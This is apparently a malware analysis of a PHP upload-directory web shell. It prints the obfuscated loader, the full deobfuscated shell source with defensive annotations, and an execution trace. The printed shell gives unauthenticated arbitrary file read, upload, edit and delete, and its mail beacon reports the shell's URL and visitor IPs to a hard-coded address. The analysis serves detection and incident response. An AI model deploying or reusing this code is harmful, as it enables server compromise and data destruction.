PHP Malware Analysis

userzero.phtml

md5: db137fc1456c45c4c755a6583044be15


Deobfuscated PHP code

<?php

/*
            By: MR.P4UL / Bo0G3yM4n
            IG: @blackeagleteam.id
            Mau Ngapain Cukk Mau Recode Yah!
            Eitss Tidak Bisa
*/
// Analyst note: the banner above is kept verbatim because it is part of the
// sample and usable as a static signature. Rough English gloss of the last two
// lines (Indonesian slang): "What are you up to, want to recode this? Nope, you can't."
//
// Stage 1 loader. $p3mu14 is a base64 string; the execution trace on this page
// shows base64_decode() of it returning an eval() call that applies, in order,
// strrev -> base64_decode -> gzinflate (three times) -> gzuncompress (twice)
// to $arif and evaluates the result. The statement in the sample that decodes
// and evaluates $p3mu14 is not reproduced in this listing; the trace attributes
// it to line 10 of the file, and the deobfuscator shows its result as the
// `eval { ... }` block further down.
// Detection: a base64 literal that decodes to eval() wrapped around stacked
// decompression calls is a strong static indicator independent of the payload.
$p3mu14 = "ZXZhbCgiPz4iLmd6dW5jb21wcmVzcyhnenVuY29tcHJlc3MoZ3ppbmZsYXRlKGd6aW5mbGF0ZShnemluZmxhdGUoYmFzZTY0X2RlY29kZShzdHJyZXYoJGFyaWYpKSkpKSkpKTs";
// The $arif assignment that follows holds the stage 2 payload: per the trace it
// is a reversed base64 string that unpacks to the PHP source shown in the
// `eval { ... }` block.
$arif = "=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";
// Analyst note: `eval { ... }` is the deobfuscator's notation for "code that
// was executed through eval()", not valid PHP. Everything inside is the decoded
// stage 2 payload: a browser-driven file manager (web shell).
// No credential, token or session check appears anywhere in this listing, so
// the visible code serves any client that can reach the file's URL.
eval /* PHPDeobfuscator eval output */ {
    /*
        Black Eagle Team Shell v2
        By : Bo0G3yM4n
        Thanks To : Black Eagle Team, Dark Clown Security
        Jangan Suka NgeRecode Klo Recode Kalian Ampas ;v
        Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell
    */
    // Banner kept verbatim (sample content). Rough gloss of the Indonesian line:
    // "Don't go recoding this; your recodes are trash". The last banner line
    // advertises features (403 bypass, auto delete, detector evasion); none of
    // the code visible in this listing implements them.

    // Remove the execution time limit and switch off PHP error reporting so
    // failures are not shown to the visitor.
    set_time_limit(0);
    error_reporting(0);
    // error_log(0) passes 0 as a log *message*; it does not change any logging
    // setting. Presumably meant to silence logging -- it may instead leave a
    // line containing "0" in the PHP error log (confirm on the affected host).
    error_log(0);
    // Page title; also a usable string signature for response bodies.
    $sname = "Black Eagle Team Minishell";
    // Filesystem function names are held in variables and invoked as variable
    // functions ($__scdir(...), $un__link(...)), so a plain search for
    // `unlink(` or `scandir(` does not match the call sites. The trace shows the
    // pre-deobfuscation source built these names from "\x.." hex escapes and
    // string concatenation.
    $__gcdir = "getcwd";
    $__fgetcon7s = "file_get_contents";
    $__scdir = "scandir";
    $rm__dir = "rmdir";
    $un__link = "unlink";
    // get_magic_quotes_gpc() was removed in PHP 8.0: on PHP 8+ this call is a
    // fatal "undefined function" error and the script stops here, before any
    // file operation. On older runtimes it strips the slashes magic quotes
    // would have added to POST values.
    if (get_magic_quotes_gpc()) {
        foreach ($_POST as $key => $value) {
            $_POST[$key] = stripslashes($value);
        }
    }
    // Emits the HTML head and banner of the shell UI. The markup makes the
    // *viewer's browser* (not the compromised server) fetch resources from
    // fonts.googleapis.com, colorlib.com, ajax.googleapis.com,
    // zerobyte-id.github.io (path /PHP-Backdoor/inc/m1n1.css) and i.postimg.cc
    // (/PJYNcNJ4/BET.jpg). The last two are sample-specific and useful as
    // content signatures for the rendered page.
    // The robots meta tag is malformed (`content"..."` has no `=`), so it
    // presumably has no effect on crawlers -- the page may be indexable.
    echo '<!DOCTYPE html>
<html>
<head>
<meta name="robots" content"noindex. nofollow">
<link href="https://fonts.googleapis.com/css?family=VT323" rel="stylesheet">
<link rel="icon" href="https://colorlib.com/preview/theme/satner/img/banner/home-right.png">
<title>' . $sname . '</title>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<link href="//zerobyte-id.github.io/PHP-Backdoor/inc/m1n1.css" rel="stylesheet" type="text/css">
</head>
<body>';
    echo '<div style="color:#ef6c00;margin-top:0;"><h1><center><img src="https://i.postimg.cc/PJYNcNJ4/BET.jpg" width="350px" height="300" style="border-radius: 100px; -moz-border-radius: 100px;"><br>' . $sname . '</center></h1></div>';
    // Working directory selection. The `path` query parameter is taken as-is
    // (no validation, no restriction to the web root) and passed to chdir();
    // without it the script's current directory is used. Every later file
    // operation is built on $path, so the requester chooses where the shell
    // operates, limited only by the web server account's filesystem rights.
    // Log hunting: GET requests to a single script carrying `path=` values that
    // walk the filesystem.
    if (isset($_GET['path'])) {
        $path = $_GET['path'];
        chdir($_GET['path']);
    } else {
        $path = $__gcdir();
    }
    // Normalise Windows separators, then split into components for the
    // breadcrumb below.
    $path = str_replace("\\", "/", $path);
    $paths = explode("/", $path);
    echo "<table width=\"100%\" border=\"0\" align=\"center\" style=\"margin-top:-10px;\"><tr><td>";
    echo "<font style='font-size:13px;'>Path: ";
    // Breadcrumb: one link per path component, each pointing at ?path=<prefix
    // up to that component>. Components are echoed without HTML escaping.
    foreach ($paths as $id => $pat) {
        echo "<a style='font-size:13px;' href='?path=";
        for ($i = 0; $i <= $id; $i++) {
            echo $paths[$i];
            if ($i != $id) {
                echo "/";
            }
        }
        echo "'>{$pat}</a>/";
    }
    // "Home" link plus the upload form: a multipart POST back to the same URL
    // with a single file field named `file`.
    echo "<br>[ <a href=\"?\">Home</a> ]</font></td><td align=\"center\" width=\"27%\"><form enctype=\"multipart/form-data\" method=\"POST\"><input type=\"file\" name=\"file\" style=\"color:#ef6c00;margin-bottom:4px;\"/><input type=\"submit\" value=\"Upload\" /></form></td></tr><tr><td colspan=\"2\">";
    // Upload handler: copies the uploaded temp file into $path under the
    // client-supplied file name. Neither the name nor the content is checked,
    // so this is an arbitrary file write into whatever directory `path` selects
    // (subject to the web server account's permissions).
    // Response strings "Upload Berhasil!!" / "Upload Gagal!!" (Indonesian for
    // upload succeeded / failed) can serve as response-body signatures.
    // Log hunting: multipart POSTs with a `file` part to a script in an upload
    // directory, followed by new files appearing alongside it.
    if (isset($_FILES['file'])) {
        if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
            echo "<center><font color=\"#00ff00\">Upload Berhasil!!</font></center><br/>";
        } else {
            echo "<center><font color=\"red\">Upload Gagal!!</font></center><br/>";
        }
    }
    echo "</td></tr><tr><td></table><div class=\"table-div\"></div><input id=\"image\" type=\"hidden\">";
    echo "";
    // Request dispatcher. Three mutually exclusive modes, chosen from the query
    // string and POST body:
    //   1. ?filesrc=<file>             -> display a file's contents
    //   2. ?option + POST opt!=delete  -> rename or edit a file
    //   3. otherwise                   -> optional delete, then directory listing
    // Parameter names seen here (GET: filesrc, option, path; POST: opt, type,
    // name, path, newname, src) are the fields to look for in web and WAF logs.
    if (isset($_GET['filesrc'])) {
        // Mode 1: arbitrary file read. The `filesrc` value goes straight to
        // file_get_contents() (called through $__fgetcon7s); only the output is
        // HTML-escaped. Anything readable by the web server account is exposed.
        echo "<table width=\"100%\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\"><tr><td>File: ";
        echo "" . basename($_GET['filesrc']);
        // The bare "" below is a no-op expression statement left by the author.
        "";
        echo "</tr></td></table><br />";
        echo "<center><textarea readonly=''>" . htmlspecialchars($__fgetcon7s($_GET['filesrc'])) . "</textarea></center>";
    } elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
        // Mode 2: rename / edit. The POSTed `path` is echoed back unescaped.
        echo '</table><br /><center>' . $_POST['path'] . '<br /><br />';
        if ($_POST['opt'] == 'rename') {
            // Rename (or move): source is the POSTed `path`, destination is
            // $path . '/' . newname, both unvalidated.
            if (isset($_POST['newname'])) {
                if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
                    echo "<center><font color=\"#00ff00\">Rename OK!</font></center><br />";
                } else {
                    echo "<center><font color=\"red\">Rename Failed!</font></center><br />";
                }
                $_POST['name'] = $_POST['newname'];
            }
            echo '<form method="POST">New Name : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" /> <input type="hidden" name="path" value="' . $_POST['path'] . '"><input type="hidden" name="opt" value="rename"><input type="submit" value="Save" /></form>';
        } elseif ($_POST['opt'] == 'edit') {
            // Edit: when `src` is posted, the target file is opened in 'w' mode
            // (truncating it) and overwritten with the posted content. This is
            // an arbitrary file write, including into existing application
            // files -- compare file hashes and mtimes under the web root when
            // scoping an incident involving this sample.
            if (isset($_POST['src'])) {
                $fp = fopen($_POST['path'], 'w');
                if (fwrite($fp, $_POST['src'])) {
                    echo "<center><font color=\"#00ff00\">Edit File OK!.</font></center><br />";
                } else {
                    echo "<center><font color=\"red\">Edit File Failed!.</font></center><br />";
                }
                fclose($fp);
            }
            // Re-read the file and show it in an editable textarea.
            echo '<form method="POST"><textarea cols=80 rows=20 name="src">' . htmlspecialchars($__fgetcon7s($_POST['path'])) . '</textarea><br /><input type="hidden" name="path" value="' . $_POST['path'] . '"><input type="hidden" name="opt" value="edit"><input type="submit" value="Save" /></form>';
        }
        echo "</center>";
    } else {
        // Mode 3: optional delete, then the directory listing.
        echo "</table><br /><center>";
        if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
            // Delete: rmdir() for type=dir, unlink() for type=file, both called
            // through the variable-function aliases on the unvalidated POSTed
            // `path`.
            if ($_POST['type'] == 'dir') {
                if ($rm__dir($_POST['path'])) {
                    echo "<center><font color=\"#00ff00\">Dir Deleted!</font></center><br />";
                } else {
                    echo "<center><font color=\"red\">Delete Dir Failed!</font></center><br />";
                }
            } elseif ($_POST['type'] == 'file') {
                if ($un__link($_POST['path'])) {
                    echo "<font color=\"#00ff00\">Delete File Done.</font><br />";
                } else {
                    echo "<font color=\"red\">Delete File Error.</font><br />";
                }
            }
        }
        echo "</center>";
        // Directory listing of $path via scandir() (called through $__scdir).
        // The result is walked twice: directories first, then regular files.
        $_scdir = $__scdir($path);
        echo "<div id=\"content\"><table width=\"100%\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\"><tr class=\"first\"> <th><center>Name</center></th><th width=\"12%\"><center>Size</center></th><th width=\"10%\"><center>Permissions</center></th> <th width=\"15%\"><center>Last Update</center></th><th width=\"11%\"><center>Options</center></th></tr>";
        foreach ($_scdir as $dir) {
            // Directories only; skip the "." and ".." entries.
            if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
                continue;
            }
            echo "<tr><td>[D] <a href=\"?path={$path}/{$dir}\">{$dir}</a></td><td><center>--</center></td><td><center>";
            // Colour the permission string: green when writable by the web
            // server account, red when not even readable.
            if (is_writable("{$path}/{$dir}")) {
                echo "<font color=\"#00ff00\">";
            } elseif (!is_readable("{$path}/{$dir}")) {
                echo "<font color=\"red\">";
            }
            echo perms("{$path}/{$dir}");
            if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
                echo "</font>";
            }
            echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("{$path}/{$dir}")) . "";
            // Per-row action form: POSTs opt (delete|rename), type=dir, name
            // and path to ?option&path=<current dir>.
            echo "</center></td> <td><center><form method=\"POST\" action=\"?option&path={$path}\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option></select><input type=\"hidden\" name=\"type\" value=\"dir\"><input type=\"hidden\" name=\"name\" value=\"{$dir}\"><input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">&nbsp;<input type=\"submit\" value=\">>\" /></form></center></td></tr>";
        }
        foreach ($_scdir as $file) {
            // Regular files only.
            if (!is_file("{$path}/{$file}")) {
                continue;
            }
            // Size in KB (3 decimals), switched to MB (2 decimals) from 1024 KB.
            $size = filesize("{$path}/{$file}") / 1024;
            $size = round($size, 3);
            if ($size >= 1024) {
                $size = round($size / 1024, 2) . ' MB';
            } else {
                $size .= ' KB';
            }
            // File name links to the viewer mode (?filesrc=...&path=...).
            echo "<tr><td>[F] <a href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td><td><center>" . $size . "</center></td><td><center>";
            if (is_writable("{$path}/{$file}")) {
                echo "<font color=\"#00ff00\">";
            } elseif (!is_readable("{$path}/{$file}")) {
                echo "<font color=\"red\">";
            }
            echo perms("{$path}/{$file}");
            if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
                echo "</font>";
            }
            echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("{$path}/{$file}")) . "";
            // Per-row action form for files: opt (delete|rename|edit), type=file.
            echo "</center></td><td><center><form method=\"POST\" action=\"?option&path={$path}\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option><option value=\"edit\">Edit</option></select><input type=\"hidden\" name=\"type\" value=\"file\"><input type=\"hidden\" name=\"name\" value=\"{$file}\"><input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">&nbsp;<input type=\"submit\" value=\">>\" /></form></center></td></tr>";
        }
        echo "</table></div>";
    }
    /**
     * Format a path's mode bits as a ten-character `ls -l` style string
     * (one file-type character followed by three rwx triplets).
     *
     * Display helper for the listing table only; it reads metadata through
     * fileperms() and changes nothing on disk.
     *
     * @param string $file Path whose mode is read with fileperms().
     * @return string Type character (s, l, -, b, d, c, p, or u when no type
     *                mask matches) plus nine permission characters, with
     *                s/S and t/T marking the setuid, setgid and sticky bits.
     */
    function perms($file)
    {
        $mode = fileperms($file);

        // File-type masks, tested in the same order as the original chain;
        // the first mask whose bits are all set decides the leading character.
        $typeLetters = array(
            0xc000 => 's',
            0xa000 => 'l',
            0x8000 => '-',
            0x6000 => 'b',
            0x4000 => 'd',
            0x2000 => 'c',
            0x1000 => 'p',
        );
        $text = 'u';
        foreach ($typeLetters as $mask => $letter) {
            if (($mode & $mask) == $mask) {
                $text = $letter;
                break;
            }
        }

        // Owner, group, other: read bit, write bit, execute bit, the special
        // bit sharing the execute slot, and its two renderings (with and
        // without execute).
        $classes = array(
            array(0x100, 0x80, 0x40, 0x800, 's', 'S'),
            array(0x20, 0x10, 0x8, 0x400, 's', 'S'),
            array(0x4, 0x2, 0x1, 0x200, 't', 'T'),
        );
        foreach ($classes as $class) {
            list($readBit, $writeBit, $execBit, $specialBit, $withExec, $withoutExec) = $class;
            $text .= ($mode & $readBit) ? 'r' : '-';
            $text .= ($mode & $writeBit) ? 'w' : '-';
            if ($mode & $execBit) {
                $text .= ($mode & $specialBit) ? $withExec : 'x';
            } else {
                $text .= ($mode & $specialBit) ? $withoutExec : '-';
            }
        }

        return $text;
    }
    // Page footer; "2020 Black Eagle Team" is another response-body signature.
    echo "<br><center>&copy; <span id=\"footer\"></span> 2020 Black Eagle Team</center><br>";
    echo "</body></html><!-- EOF -->";
    // Runtime settings, errors suppressed with @. Note header() is called after
    // the whole page has already been echoed, so unless output is buffered it
    // presumably cannot take effect (the resulting warning is hidden by
    // error_reporting(0)) -- confirm against the server configuration.
    @ini_set('output_buffering', 0);
    @ini_set('display_errors', 0);
    set_time_limit(0);
    ini_set('memory_limit', '64M');
    header('Content-Type: text/html; charset=UTF-8');
    // Notification beacon. There is no condition around this code, so each
    // request that runs to the end of the script sends a mail through PHP's
    // mail() to the hard-coded recipient below. The body carries the shell's
    // own URL (built from SERVER_NAME and REQUEST_URI) and the requesting
    // client's REMOTE_ADDR; "Akses" is Indonesian for "access" and the subject
    // reads roughly "Papa Yui Chan got a shell".
    // Detection: the recipient address and the fixed subject string are IoCs
    // to search for in the host's MTA / outbound mail logs; a hit also tells
    // the responder the shell's location has been disclosed to the operator.
    // The 4th mail() argument is the additional-headers slot; "[ <ip> ]" is not
    // a well-formed header line, so delivery behaviour may vary by PHP version
    // and MTA -- verify rather than assume the mail was sent.
    $to = 'alfredofernandezbutar@gmail.com';
    $f31337 = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
    $fie = "Akses {$f31337} :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
    mail($to, "Papa Yui Chan Dapet Shell Nih : )", $fie, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
};
// End of the decoded payload; the script terminates after the eval()'d code.
exit;

Execution traces

data/traces/db137fc1456c45c4c755a6583044be15_trace-1676258413.8261.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:20:39.723937]
1	0	1	0.000157	393528
1	3	0	0.000234	398400	{main}	1		/var/www/html/uploads/userzero.phtml	0	0
1		A						/var/www/html/uploads/userzero.phtml	8	$p3mu14 = 'ZXZhbCgiPz4iLmd6dW5jb21wcmVzcyhnenVuY29tcHJlc3MoZ3ppbmZsYXRlKGd6aW5mbGF0ZShnemluZmxhdGUoYmFzZTY0X2RlY29kZShzdHJyZXYoJGFyaWYpKSkpKSkpKTs'
1		A						/var/www/html/uploads/userzero.phtml	9	$arif = '=wb+JvwdMZRM/UfOfx3IuBJOw0wJj7OJMQsLQ/+ouwny9xLDtTOE4mfGzXC6AFHqScMOc5aLJDUDKRP9kju/De/8YKI0GqPuhcIgtHbOlM/989ZL5uWvYRuLkTPqWLwiBciezWPc6Dje/P06/reutPDbqvvzO5ij+a4NXt/3r2/1GRvqmmJa6+DCSy/INqB1pdztqmQR4jDTn70PFI5FM+bzuWW0M7hOUmAnKnJVeucFPWJnY4H75mjDi2mxwBzzouoQrAQeGFS9vlBK8YxJjv9KeyGOBD4uoCvXn7cZEi6gq/L3h10lU7YPH2HC2SRpu8RUBY8pwFY4yIW8j2MgQerhkdOhihbU6P+vg2tf1YuiLTJj+/PpLTpX0R6HUdsQxXPTV8W2zcssm+Qp8PYqeYKxc7I9zTs/NoKHfdQS16/3SUvOxX6FFjW9wJS5ATEqgWcMS0qcKiW9SIr2J+0PtGVKn1sqlwV+iS1n0o0yHraJ8YvoT9s6hla5eoj4GWru'
2	4	0	0.000299	398400	base64_decode	0		/var/www/html/uploads/userzero.phtml	10	1	'ZXZhbCgiPz4iLmd6dW5jb21wcmVzcyhnenVuY29tcHJlc3MoZ3ppbmZsYXRlKGd6aW5mbGF0ZShnemluZmxhdGUoYmFzZTY0X2RlY29kZShzdHJyZXYoJGFyaWYpKSkpKSkpKTs'
2	4	1	0.000320	398592
2	4	R			'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($arif))))))));'
2	5	0	0.000339	398560	urldecode	0		/var/www/html/uploads/userzero.phtml	10	1	'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($arif))))))));'
2	5	1	0.000356	398720
2	5	R			'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($arif))))))));'
2	6	0	0.000374	398528	htmlspecialchars_decode	0		/var/www/html/uploads/userzero.phtml	10	1	'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($arif))))))));'
2	6	1	0.000391	398560
2	6	R			'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($arif))))))));'
2	7	0	0.000420	400952	eval	1	'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($arif))))))));'	/var/www/html/uploads/userzero.phtml	10	0
3	8	0	0.000437	400952	strrev	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code	1	1	'=wb+JvwdMZRM/UfOfx3IuBJOw0wJj7OJMQsLQ/+ouwny9xLDtTOE4mfGzXC6AFHqScMOc5aLJDUDKRP9kju/De/8YKI0GqPuhcIgtHbOlM/989ZL5uWvYRuLkTPqWLwiBciezWPc6Dje/P06/reutPDbqvvzO5ij+a4NXt/3r2/1GRvqmmJa6+DCSy/INqB1pdztqmQR4jDTn70PFI5FM+bzuWW0M7hOUmAnKnJVeucFPWJnY4H75mjDi2mxwBzzouoQrAQeGFS9vlBK8YxJjv9KeyGOBD4uoCvXn7cZEi6gq/L3h10lU7YPH2HC2SRpu8RUBY8pwFY4yIW8j2MgQerhkdOhihbU6P+vg2tf1YuiLTJj+/PpLTpX0R6HUdsQxXPTV8W2zcssm+Qp8PYqeYKxc7I9zTs/NoKHfdQS16/3SUvOxX6FFjW9wJS5ATEqgWcMS0qcKiW9SIr2J+0PtGVKn1sqlwV+iS1n0o0yHraJ8YvoT9s6hla5eoj4GWru'
3	8	1	0.000466	405080
3	8	R			'AdYLKfQB0Qsu9AHMCzP0eJwBwQs+9Hic1Vp7c9s2Ev/fM/4OCOqGcmuJesV29UqdWE5fdny20pmM5dFAJCQhpkiWhGI713732wX41sNyrr2Z08QhCewusK8fFiA7r/2Zv7tjfre7Q+D3xmHWHemzqcPJgLM5uZ5xxyGf61H3I2mRN171XePxvOnqtsGMuXchGXjYVWA/IKcsuCNvHe/eJdfcWgRCPmq2X5g7ZdC4uGPkYsqvuOXZnPzqeCS+ZY4AgpO5z0LS/hxPAJ5C0qw2yJkXjIVtc5eY5GQhPXLKHS55NGOTXP50Sc6Zc88CDl2SW9ILoPlcuCJEkt2d78zdnZDLkRRzPnLEXMhSdb+9u8ODwAtGAfe9QAp3mm10vOhxL3TZnBP96xJa1JySCqHpYBRZRqOpZYsgZhk+HB4pMrh5NXw4asK1AdcjuDYjhsmUS8tzj8KI4RD+foA/C3ki5lcTlJQKUc8g6BCvPBL8Kr0/akTCw+xswngqyFnT1IfI'
